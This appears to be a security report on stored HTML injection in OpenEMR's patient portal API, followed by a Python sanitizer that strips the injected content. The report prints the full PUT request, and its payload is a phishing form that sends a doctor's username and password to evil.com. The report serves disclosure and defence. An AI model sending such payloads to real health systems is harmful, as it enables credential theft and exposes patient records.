It looks like, through the PUT request, a patient can rewrite their own onsite document via the fullDocument
JSON parameter. A malicious patient can therefore override the document form and replace it with their own content, including valid HTML that the doctor will see when reviewing the document (stored HTML injection in the provider-facing view).
The PUT request goes to the /openemr/portal/patient/api/onsitedocument/<ID> endpoint; the fullDocument JSON param is the value the patient can change. Request used for the test (the fullDocument value carries the injected phishing form):

PUT /openemr/portal/patient/api/onsitedocument/7 HTTP/1.1
Host: demo.openemr.io

{"id":"2","pid":"1","facility":"0","provider":"0","encounter":"0","createDate":"2022-12-26 04:18:41","docType":"Insurance Info","patientSignedStatus":"0","patientSignedTime":"0000-00-00 00:00:00","authorizeSignedTime":"0000-00-00 00:00:00","acceptSignedStatus":"0","authorizingSignator":"","reviewDate":"0000-00-00 00:00:00","denialReason":"In review","authorizedSignature":"","patientSignature":"","fullDocument":"<h3>please provide your username and password:</h3><br><form method='post' action='//evil.com/login.php'>username:<input type='text' name='username' /><br />password: <input type='password' name='password'><br /><input type='submit' value='login' /></form><br /><a href="//evil.com">click here</a>
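The check the portal is missing, as an added example (Python, standard library only; not OpenEMR's own code): an allow-list sanitizer run over the fullDocument value before it is stored on the PUT and again before it is rendered to the doctor. Only the payload string is taken from the request above; the tag and attribute allow-lists, the `same_site` rule and the function names are assumptions for illustration.

```python
# Added example (Python stdlib only), not OpenEMR code: an allow-list sanitizer
# for a patient-supplied onsite document body. Tag/attribute lists and function
# names are assumptions for illustration; REPORT_PAYLOAD is the fullDocument
# value from the request above.
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

ALLOWED_TAGS = {"p", "br", "hr", "b", "i", "u", "strong", "em", "h1", "h2", "h3",
                "h4", "ul", "ol", "li", "span", "div", "table", "tr", "td", "th", "a"}
ALLOWED_ATTRS = {"a": {"href"}}  # every attribute not listed here is dropped
# Void elements never get a closing tag, so they must not change nesting depth.
VOID_TAGS = {"area", "base", "br", "col", "embed", "hr", "img", "input", "link",
             "meta", "source", "track", "wbr"}
# Dropped elements that are worth an alert, not just a silent strip.
DANGEROUS_TAGS = {"form", "script", "iframe", "object", "embed", "meta", "link", "base"}

REPORT_PAYLOAD = (  # the fullDocument value from the PUT request above
    "<h3>please provide your username and password:</h3><br>"
    "<form method='post' action='//evil.com/login.php'>"
    "username:<input type='text' name='username' /><br />"
    "password: <input type='password' name='password'><br />"
    "<input type='submit' value='login' /></form><br />"
    '<a href="//evil.com">click here</a>'
)


def same_site(url: str) -> bool:
    """Accept only relative paths: no scheme, no host, no //host, no control chars."""
    url = url.strip()
    if any(ord(c) < 0x20 for c in url) or url.startswith("\\"):
        return False
    parts = urlparse(url)
    return parts.scheme == "" and parts.netloc == ""


class Sanitizer(HTMLParser):
    """Re-serialises only allowed tags/attributes; records everything it drops."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.findings = []   # (what, reason) pairs for logging or alerting
        self.skip_depth = 0  # > 0 while inside a dropped container element

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:                 # inside a dropped element
            if tag not in VOID_TAGS:
                self.skip_depth += 1
            return
        if tag not in ALLOWED_TAGS:
            self.findings.append((tag, "tag not allowed"))
            if tag not in VOID_TAGS:
                self.skip_depth = 1         # drop the element and its contents
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, ()):
                self.findings.append((f"{tag}@{name}", "attribute not allowed"))
            elif name == "href" and not same_site(value):
                self.findings.append((f"{tag}@{name}", f"off-site target {value}"))
            else:
                kept.append(f' {name}="{escape(value)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in VOID_TAGS:
            return
        if self.skip_depth:
            self.skip_depth -= 1
            return
        if tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:             # text is always re-escaped on output
            self.out.append(escape(data))
    # comments, doctypes and processing instructions hit the no-op defaults: dropped


def sanitize_document(html: str):
    """Return (clean_html, findings) for a fullDocument value."""
    s = Sanitizer()
    s.feed(html)
    s.close()
    return "".join(s.out), s.findings


def is_suspicious(findings) -> bool:
    """True when the document tried to embed a form/script or an off-site target."""
    return any(what.split("@")[0] in DANGEROUS_TAGS or reason.startswith("off-site")
               for what, reason in findings)


if __name__ == "__main__":
    clean, findings = sanitize_document(REPORT_PAYLOAD)
    print(clean)
    for what, reason in findings:
        print(f"dropped {what}: {reason}")
    print("ALERT: phishing-style content" if is_suspicious(findings) else "ok")
```

Run as a script it prints the neutralised document (heading, line breaks and a link with no target) and two findings: the dropped form and the off-site href. The `same_site` rule and the `is_suspicious` alert deliberately go beyond the single payload in the report (javascript: URLs, inline event handlers, protocol-relative links), since a server-side check has to cover whatever the next tester sends, and running it on the PUT rather than only at render time keeps the stored copy clean for every other consumer of the document.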